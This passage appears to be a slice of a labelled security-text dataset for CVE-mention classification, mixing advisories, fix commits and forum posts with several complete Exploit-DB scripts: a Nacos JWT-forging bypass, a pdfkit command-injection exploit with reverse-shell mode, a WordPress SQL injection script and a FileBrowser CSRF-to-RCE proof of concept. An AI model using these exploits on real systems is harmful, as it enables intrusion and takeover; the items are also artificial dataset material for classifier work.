Escape filenames in artifact tab", "source": "cvefixes", "timestamp": "2022-04-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "444d56e31e78c3517f4c", "text": "danishen6696: dpkg -l | grep -c ‘^ii’ This worked for me dpkg -l | grep -c ‘^ii’", "source": "hackthebox", "timestamp": "2023-03-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "a1e89429383892c5fdd5", "text": "[Unknown] ReDoS (Rails::Html::PermitScrubber.scrub_attribute)\n\nI reported at https://hackerone.com/reports/1684163\n\nhttps://github.com/rails/rails-html-sanitizer/security/advisories/GHSA-5x79-w82f-gw8w\n\n> Certain configurations of rails-html-sanitizer < 1.4.4 use an inefficient regular expression that is susceptible to excessive backtracking when attempting to sanitize certain SVG attributes. This may lead to a denial of service through CPU resource consumption.\n\nIt seems that the same problem existed on the Loofah side, so it was fixed as well. That has been fixed as CVE-2022-23514(https://github.com/flavorjones/loofah/security/advisories/GHSA-486f-hjj9-9vhh)\n\n## Impact\n\nReDoS may occur if scrub is executed in Rails::Html::PermitScrubber.", "source": "hackerone", "timestamp": "2022-12-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d164de7e463be4f68e33", "text": "Cryptojacking: a hands-on guide for pentesters\n\nCryptojacking: a hands-on guide for pentesters Because attackers continuously devise new schemes for monetizing hacked machines, cryptojacking has emerged as one of the top ways for cybercriminals to turn hacks into cash. Read more: Learn Ethical Hacking and Penetration Testing Online – 2 May 22 Cryptojacking: a hands-on guide for pentesters using Monero (XMR) Step-by-step guide to cryptojacking with Monero (XMR) using realistic malware. Hands-on guide for pentesters to learn malicious cryptomining Est. reading time: 6 minutes", "source": "hackersploit", "timestamp": "2022-05-05", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4a6986f39da8549db18b", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore. This CVE ID is unique from CVE-2018-8267.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7855e34ae1509624ac33", "text": "CVE: CVE-2022-0506\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in Packagist microweber/microweber prior to 1.2.11.'}]\n\nFix commit: add css middleware", "source": "cvefixes", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7bb32a9e6f7f0618c3f6", "text": ".NET Remote Code Execution Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-35390: .NET Remote Code Execution Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0 and .NET 6.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists when some dotnet commands are used in directories with weaker permissions which can result in remote code execution.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/266\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0.1xx SDK 7.0.109 or earlier.\n* Any .NET 7.0.3xx SDK 7.0.306 or earlier.\n* Any .NET 6.0.1xx SDK 6.0.120 or earlier.\n* Any .NET 6.0.3xx SDK 6.0.315 or earlier.\n* Any .NET 6.0.4xx SDK 6.0.412 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[ Microsoft.NET.Build.Containers](https://www.nuget.org/packages/Microsoft.NET.Build.Containers) | <= 7.0.306 | 7.0.307, 7.0.400\n\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.300\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.300 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.AspNetCore.App]\n Microsoft.NETCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.NETCore.App]\n Microsoft.WindowsDesktop.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Microsoft.WindowsDesktop.App]\n\nTo install additional .NET Core runtimes or SDKs:\n https://aka.ms/dotnet-download\n```\n\n* If you're using .NET 7.0, you should download and install Runtime 7.0.10 or SDK 7.0.110 (for Visual Studio 2022 v17.4) from https://dotnet.microsoft.com/download/dotnet-core/7.0.\n* If you're using .NET 6.0, you should download and install Runtime 6.0.21 or SDK 6.0.316 (for Visual Studio 2022 v17.2) from https://dotnet.microsoft.com/download/dotnet-core/6.0.\n\n.NET 6.0 and and .NET 7.0 updates are also available from Microsoft Update. To access this either type \"Check for updates\" in your Windows search, or open Settings, choose Update & Security and then click Check for Updates.\n\nOnce you have installed the updated runtime or SDK, restart your apps for the update to take effect.\n\nAdditionally, if you've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted v", "source": "github_advisory", "timestamp": "2023-08-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7fb703881386dba977c5", "text": "Hello. I use an ALFA AWUS036NHA for wireless adapter and it works flawlessly and doesn’t cost a fortune. I’d highly recommend it for someone starting up where you may not want to throw a lot of cash into the equipment. Example link (Amazon) .", "source": "hackersploit", "timestamp": "2022-03-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "bd78b7ae2f4c5286f24f", "text": "CVE: CVE-2022-32065\n\n[{'lang': 'en', 'value': 'An arbitrary file upload vulnerability in the background management module of RuoYi v4.7.3 and below allows attackers to execute arbitrary code via a crafted HTML file.'}]\n\nFix commit: 用户头像上传格式限制", "source": "cvefixes", "timestamp": "2022-07-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "03d471bcf8944b0350f6", "text": "CVE: CVE-2022-28388\n\n[{'lang': 'en', 'value': 'usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free.'}]\n\nFix commit: can: usb_8dev: usb_8dev_start_xmit(): fix double dev_kfree_skb() in error path\n\nThere is no need to call dev_kfree_skb() when usb_submit_urb() fails\nbecause can_put_echo_skb() deletes original skb and\ncan_free_echo_skb() deletes the cloned skb.\n\nFixes: 0024d8ad1639 (\"can: usb_8dev: Add support for USB2CAN interface from 8 devices\")\nLink: https://lore.kernel.org/all/20220311080614.45229-1-hbh25y@gmail.com\nCc: stable@vger.kernel.org\nSigned-off-by: Hangyu Hua \nSigned-off-by: Marc Kleine-Budde ", "source": "cvefixes", "timestamp": "2022-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "63adf2051ad303f6707d", "text": "Did you keep in mind the different time zones? The displayed time zone is your local time zone in UTC, the server might have a different one. Thus, ±1 s is probably not enough", "source": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "14abfc6d63f008d27cf9", "text": "Nacos 2.0.3 - Access Control vulnerability\n\n# Exploit Title: Nacos 2.0.3 - Access Control vulnerability\n# Date: 2023-01-17\n# Exploit Author: Jenson Zhao\n# Vendor Homepage: https://nacos.io/\n# Software Link: https://github.com/alibaba/nacos/releases/\n# Version: Up to (including)2.0.3\n# Tested on: Windows 10\n# CVE : CVE-2021-43116\n# Required before execution: pip install PyJWT,requests\nimport argparse\nimport base64\nimport requests\nimport time\nimport json\nfrom jwt.algorithms import has_crypto, requires_cryptography\nfrom jwt.utils import base64url_encode, force_bytes\nfrom jwt import PyJWS\n\nclass MyPyJWS(PyJWS):\n def encode(self,\n payload, # type: Union[Dict, bytes]\n key, # type: str\n algorithm='HS256', # type: str\n headers=None, # type: Optional[Dict]\n json_encoder=None # type: Optional[Callable]\n ):\n segments = []\n\n if algorithm is None:\n algorithm = 'none'\n\n if algorithm not in self._valid_algs:\n pass\n\n # Header\n header = {'alg': algorithm}\n\n if headers:\n self._validate_headers(headers)\n header.update(headers)\n\n json_header = force_bytes(\n json.dumps(\n header,\n separators=(',', ':'),\n cls=json_encoder\n )\n )\n\n segments.append(base64url_encode(json_header))\n segments.append(base64url_encode(payload))\n\n # Segments\n signing_input = b'.'.join(segments)\n try:\n alg_obj = self._algorithms[algorithm]\n key = alg_obj.prepare_key(key)\n signature = alg_obj.sign(signing_input, key)\n\n except KeyError:\n if not has_crypto and algorithm in requires_cryptography:\n raise NotImplementedError(\n \"Algorithm '%s' could not be found. Do you have cryptography \"\n \"installed?\" % algorithm\n )\n else:\n raise NotImplementedError('Algorithm not supported')\n\n segments.append(base64url_encode(signature))\n\n return b'.'.join(segments)\n\n\ndef JwtGenerate():\n Secret = 'SecretKey01234567890123456789012345678901234567890123456789012345678'\n payload = json.dumps(\n {\n \"sub\": \"nacos\",\n \"exp\": int(time.time()) + 3600\n },\n separators=(',', ':')\n ).encode('utf-8')\n encoded_jwt = MyPyJWS().encode(payload, base64.urlsafe_b64decode(Secret), algorithm='HS256')\n return encoded_jwt.decode()\n\ndef check(url, https, token):\n if https:\n r = requests.get(\n url='https://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=',\n verify=False)\n else:\n r = requests.get(\n url='http://' + url + '/nacos/v1/cs/configs?dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=10&tenant=&search=accurate&accessToken=' + token + '&username=')\n if r.status_code == 403:\n print(\"There is no CVE-2021-43116 problem with the url!\")\n else:\n print(\"There is CVE-2021-43116 problem with the url!\")\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--target\", help=\"URL of the target. example: 192.168.1.1:8848\")\n parser.add_argument(\"-s\", \"--https\", help=\"Whether https is used. Default is false\")\n args = parser.parse_args()\n url = args.target\n https = False\n if (args.https):\n https = args.https\n if url:\n check(url, https, JwtGenerate())\n else:\n print('Please enter URL!')", "source": "exploitdb", "timestamp": "2023-04-03", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6a9018c4889d70f18377", "text": "pdfkit v0.8.7.2 - Command Injection\n\n#!/usr/bin/env python3\n# Exploit Title: pdfkit v0.8.7.2 - Command Injection\n# Date: 02/23/2023\n# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)\n# Vendor Homepage: https://pdfkit.org/\n# Software Link: https://github.com/pdfkit/pdfkit\n# Version: 0.0.0-0.8.7.2\n# Tested on: pdfkit 0.8.6\n# CVE: CVE-2022–25765\n# Source: https://github.com/UNICORDev/exploit-CVE-2022-25765\n# Description: The package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.\n\n# Imports\nimport time\nimport sys\nimport requests\nfrom urllib.parse import quote\n\n\nclass color:\n red = '\\033[91m'\n gold = '\\033[93m'\n blue = '\\033[36m'\n green = '\\033[92m'\n no = '\\033[0m'\n\n\n# Print UNICORD ASCII Art\ndef UNICORD_ASCII():\n print(rf\"\"\"\n{color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no}\n{color.red} ,~~`( )_( )-\\| {color.blue}/ / / / |/ / _/ ___/ __ \\/ _ \\/ _ \\{color.no}\n{color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no}\n{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\\____/_/|_/___/\\___/\\____/_/|_/____/{color.green}....{color.no}\n \"\"\")\n\n\n# Print exploit help menu\ndef help():\n print(r\"\"\"UNICORD Exploit for CVE-2022–25765 (pdfkit) - Command Injection\n\nUsage:\n python3 exploit-CVE-2022–25765.py -c \n python3 exploit-CVE-2022–25765.py -s \n python3 exploit-CVE-2022–25765.py -c [-w -p ]\n python3 exploit-CVE-2022–25765.py -s [-w -p ]\n python3 exploit-CVE-2022–25765.py -h\n\nOptions:\n -c Custom command mode. Provide command to generate custom payload with.\n -s Reverse shell mode. Provide local IP and port to generate reverse shell payload with.\n -w URL of website running vulnerable pdfkit. (Optional)\n -p POST parameter on website running vulnerable pdfkit. (Optional)\n -h Show this help menu.\n\"\"\")\n exit()\n\n\ndef loading(spins):\n\n def spinning_cursor():\n while True:\n for cursor in '|/-\\\\':\n yield cursor\n\n spinner = spinning_cursor()\n for _ in range(spins):\n sys.stdout.write(next(spinner))\n sys.stdout.flush()\n time.sleep(0.1)\n sys.stdout.write('\\b')\n\n\n# Run the exploit\ndef exploit(payload, exploitMode, postArg):\n\n UNICORD_ASCII()\n\n print(f\"{color.blue}UNICORD: {color.red}Exploit for CVE-2022–25765 (pdfkit) - Command Injection{color.no}\")\n loading(15)\n print(f\"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}\")\n print(f\"{color.blue}PAYLOAD: {color.gold}\" + payload + f\"{color.no}\")\n\n if \"web\" in exploitMode:\n if exploitMode == \"webcommand\":\n print(\n f\"{color.blue}WARNING: {color.gold}Wrap custom command in \\\"quotes\\\" if it has spaces.{color.no}\")\n else:\n print(\n f\"{color.blue}LOCALIP: {color.gold}{listenIP}:{listenPort}{color.no}\")\n print(\n f\"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port. \\\"nc -lnvp {listenPort}\\\".{color.no}\")\n print(f\"{color.blue}WEBSITE: {color.gold}{website}{color.no}\")\n print(f\"{color.blue}POSTARG: {color.gold}{postArg}{color.no}\")\n if \"http\" not in website:\n print(\n f\"{color.blue}ERRORED: {color.red}Make sure website has schema! Like \\\"http://\\\".{color.no}\")\n exit()\n postArg = postArg + \"=\" + quote(payload, safe=\"\")\n try:\n response = requests.post(website, postArg)\n except:\n print(\n f\"{color.blue}ERRORED: {color.red}Couldn't connect to website!{color.no}\")\n exit()\n loading(15)\n print(f\"{color.blue}EXPLOIT: {color.gold}Payload sent to website!{color.no}\")\n loading(15)\n print(f\"{color.blue}SUCCESS: {color.g", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d918f36298c123560f06", "text": "CVE: CVE-2022-27666\n\n[{'lang': 'en', 'value': 'A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with a normal user privilege to overwrite kernel heap objects and may cause a local privilege escalation threat.'}]\n\nFix commit: esp: Fix possible buffer overflow in ESP transformation\n\nThe maximum message size that can be send is bigger than\nthe maximum site that skb_page_frag_refill can allocate.\nSo it is possible to write beyond the allocated buffer.\n\nFix this by doing a fallback to COW in that case.\n\nv2:\n\nAvoid get get_order() costs as suggested by Linus Torvalds.\n\nFixes: cac2661c53f3 (\"esp4: Avoid skb_cow_data whenever possible\")\nFixes: 03e2a30f6a27 (\"esp6: Avoid skb_cow_data whenever possible\")\nReported-by: valis \nSigned-off-by: Steffen Klassert ", "source": "cvefixes", "timestamp": "2022-03-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "187f7af0fa34f51c3d90", "text": "CVE: CVE-2022-0895\n\n[{'lang': 'en', 'value': 'Static Code Injection in GitHub repository microweber/microweber prior to 1.3.'}]\n\nFix commit: Update ContactInformationTrait.php", "source": "cvefixes", "timestamp": "2022-03-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b94f4731bc4f75108eff", "text": "Thanks to everyone posting on this… I’m really enjoying this module including the “Take Control of EIP” lesson… but was stuck too until seeing everyone’s posts. The “Take Control of EIP” quiz “Examine the registers and submit the address of EBP as the answer” is asking the student to submit something other than the correct answer. It does not want the address of anything, but instead, as others have made clear, something else related to EBP.", "source": "hackthebox", "timestamp": "2022-10-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2367d88d004d13f98821", "text": "It is important to follow proper procedures and seek assistance from authorized personnel or manufacturers if a password is forgotten or lost. Engaging in unauthorized access to a computer system or device can result in severe legal consequences.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e19672c9719eacfa1bcf", "text": "Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)\n\n# Exploit Title: Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)\n# Date 28.01.2022\n# Exploit Author: Ron Jost (Hacker5preme)\n# Vendor Homepage: https://www.download-monitor.com/\n# Software Link: https://downloads.wordpress.org/plugin/download-monitor.4.4.4.zip\n# Version: < 4.4.5\n# Tested on: Ubuntu 20.04\n# CVE: CVE-2021-24786\n# CWE: CWE-89\n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24786/README.md\n\n'''\nDescription:\nThe Download Monitor WordPress plugin before 4.4.5 does not properly validate and escape the \"orderby\" GET parameter\nbefore using it in a SQL statement when viewing the logs, leading to an SQL Injection issue\n'''\n\n# Banner:\nbanner = '''\n\n ___ __ ____ ___ ____ _ ____ _ _ _____ ___ __\n / __\\/\\ /\\/__\\ |___ \\ / _ \\___ \\/ | |___ \\| || |___ ( _ ) / /_\n / / \\ \\ / /_\\_____ __) | | | |__) | |_____ __) | || |_ / // _ \\| '_ \\\n/ /___ \\ V //_|_____/ __/| |_| / __/| |_____/ __/|__ _/ /| (_) | (_) |\n\\____/ \\_/\\__/ |_____|\\___/_____|_| |_____| |_|/_/ \\___/ \\___/\n\n [+] Download Monitor - SQL-Injection\n [@] Developed by Ron Jost (Hacker5preme)\n'''\nprint(banner)\n\nimport argparse\nimport requests\nfrom datetime import datetime\n\n# User-Input:\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')\nmy_parser.add_argument('-T', '--IP', type=str)\nmy_parser.add_argument('-P', '--PORT', type=str)\nmy_parser.add_argument('-U', '--PATH', type=str)\nmy_parser.add_argument('-u', '--USERNAME', type=str)\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\nargs = my_parser.parse_args()\ntarget_ip = args.IP\ntarget_port = args.PORT\nwp_path = args.PATH\nusername = args.USERNAME\npassword = args.PASSWORD\n\nprint('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))\n\n# Authentication:\nsession = requests.Session()\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\ncheck = session.get(auth_url)\n# Header:\nheader = {\n 'Host': target_ip,\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\n 'Accept-Encoding': 'gzip, deflate',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Origin': 'http://' + target_ip,\n 'Connection': 'close',\n 'Upgrade-Insecure-Requests': '1'\n}\n\n# Body:\nbody = {\n 'log': username,\n 'pwd': password,\n 'wp-submit': 'Log In',\n 'testcookie': '1'\n}\nauth = session.post(auth_url, headers=header, data=body)\n\n# Exploit (WORKS ONLY IF ONE LOG EXISTS)\nprint('')\nprint ('[i] If the exploit does not work, log into wp-admin and add a file and download it to create a log')\nprint('')\n# Generate payload for SQL-Injection\nsql_injection_code = input('[+] SQL-INJECTION COMMAND: ')\nsql_injection_code = sql_injection_code.replace(' ', '+')\nexploitcode_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/edit.php?post_type=dlm_download&page=download-monitor-logs&orderby=download_date`' + sql_injection_code + '`user_id'\nexploit = session.get(exploitcode_url)\nprint(exploit)\nprint('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))", "source": "exploitdb", "timestamp": "2022-02-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "d594a2e39bc9164bd5c9", "text": "FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)\n\n# Exploit Title: FileBrowser 2.17.2 - Cross Site Request Forgery (CSRF) to Remote Code Execution (RCE)\n# Date: 5/2/2022\n# Exploit Author: FEBIN MON SAJI\n# Vendor Homepage: https://filebrowser.org/\n# Software Link: https://github.com/filebrowser/filebrowser\n# Version: FileBrowser <= 2.17.2\n# Tested on: Ubuntu 20.04\n# CVE : CVE-2021-46398\n\n1. Description:\n\nA Cross-Site Request Forgery vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim. An admin can run commands using the FileBrowser and hence it leads to RCE.\n\n2. Proof Of Concept:\n\n\n \n \n

    FileBrowser CSRF PoC by Febin

    \n\n \n\n \n\n
    \n\n \n\n \n\n
    \n\n \n\n\n\n\n\n3. HTTP request intercept:\n\nPOST /api/users HTTP/1.1\nHost: 127.0.0.1:8081\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: text/plain\nContent-Length: 465\nConnection: close\nCookie: auth=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjp7ImlkIjoxLCJsb2NhbGUiOiJlbiIsInZpZXdNb2RlIjoibW9zYWljIiwic2luZ2xlQ2xpY2siOmZhbHNlLCJwZXJtIjp7ImFkbWluIjp0cnVlLCJleGVjdXRlIjp0cnVlLCJjcmVhdGUiOnRydWUsInJlbmFtZSI6dHJ1ZSwibW9kaWZ5Ijp0cnVlLCJkZWxldGUiOnRydWUsInNoYXJlIjp0cnVlLCJkb3dubG9hZCI6dHJ1ZX0sImNvbW1hbmRzIjpbXSwibG9ja1Bhc3N3b3JkIjpmYWxzZSwiaGlkZURvdGZpbGVzIjpmYWxzZX0sImV4cCI6MTY0NDA4OTE3MiwiaWF0IjoxNjQ0MDgxOTcyLCJpc3MiOiJGaWxlIEJyb3dzZXIifQ.hdFWg3SIQQ-4P8K48yru-152NGItZPKau6EBL6m8RJE\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: cross-site\nSec-GPC: 1\n\n{\"what\":\"user\",\"which\":[],\"data\":{\"scope\":\"../../../../root/\",\"locale\":\"en\",\"viewMode\":\"mosaic\",\"singleClick\":false,\"sorting\":{\"by\":\"\",\"asc\":false},\"perm\":{\"admin\":true,\"execute\":true,\"create\":true,\"rename\":true,\"modify\":true,\"delete\":true,\"share\":true,\"download\":true},\"commands\":[],\"hideDotfiles\":false,\"username\":\"pwned\",\"password\":\"\",\"rules\":[{\"allow\":true,\"path\":\"../\",\"regex\":false,\"regexp\":{\"raw\":\"\"}}],\"lockPassword\":false,\"id\":0,\"password\":\"pwned\"}}=test\n\n\n4. References:\n\nhttps://febin0x4e4a.wordpress.com/2022/01/19/critical-csrf-in-filebrowser/\nhttps://febin0x4e4a.blogspot.com/2022/01/critical-csrf-in-filebrowser.html\nhttps://systemweakness.com/critical-csrf-to-rce-in-filebrowser-865a3c34b8e7\n\n\n\n5. Detailed Description:\n\nThe Vulnerability - CSRF to RCE\n\nFileBrowser is a popular file manager/file managing interface developed in the Go language. Admin can create multiple users, even another Admin privileged user, and give access to any directory he wants, the user creation is handled by an endpoint “/api/users”.\n\nThe endpoint accepts input in JSON format to create users, but fails to verify that the “Content-Type” HTTP header, the Content-Type header’s value should be “application/json” but it accepts “text/plain” and that’s where the vulnerability arises. Also, the “Ori", "source": "exploitdb", "timestamp": "2022-02-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "e9a016940ae8bb9898f4", "text": "I tried this and got the correct answer: htb-student@nixfund:~$ find / -name “*.log” 2>/dev/null | wc -l 32", "source": "hackthebox", "timestamp": "2023-03-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "508b083a82904e738015", "text": "BoxBuster: arry is 1337. If you know you know. You need to use the user name you have VERY recently used", "source": "hackthebox", "timestamp": "2022-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "421e67fbbaa25a8f5ba7", "text": "Libc 2.34\n\nSometimes in CTF’s I observe that certain binaries are compiled with a later version of libc such as 2.34 or 2.35 and so every time I run the binary, I encounter an error message saying; ./babyheap: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34’ not found (required by ./babyheap)` Can someone help me with patching up the binary with the libc 2.35. I tried to download libc2.35 from here", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "458115c64869cbba0789", "text": ".NET Remote Code Execution Vulnerability\n\n[Severity: HIGH]\n\n# Microsoft Security Advisory CVE-2023-33128: .NET Remote Code Execution Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 7.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nA vulnerability exists in .NET source generator for P/Invokes that can lead to generated code freeing uninitialized memory and crashing.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/253\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n* Any .NET 7.0.1xx SDK 7.0.106 or earlier.\n* Any .NET 7.0.3xx SDK 7.0.303 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.NetCore.App.Runtime.linux-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-musl-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-musl-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.linux-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.linux-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.osx-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.osx-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.osx-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-arm](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.5 | 7.0.7\n[Microsoft.NetCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NetCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.5 | 7.0.7\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you are a library author and have used one of the affected versions listed above, please update, recompile, and redistribute your libraries.\n* If you have .NET 7.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.", "source": "github_advisory", "timestamp": "2023-06-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "08ea6ca76d2e571a7afb", "text": "Hello, I stuck at flag4. So, to be honest I dont havy any ideas how should I proceed. I 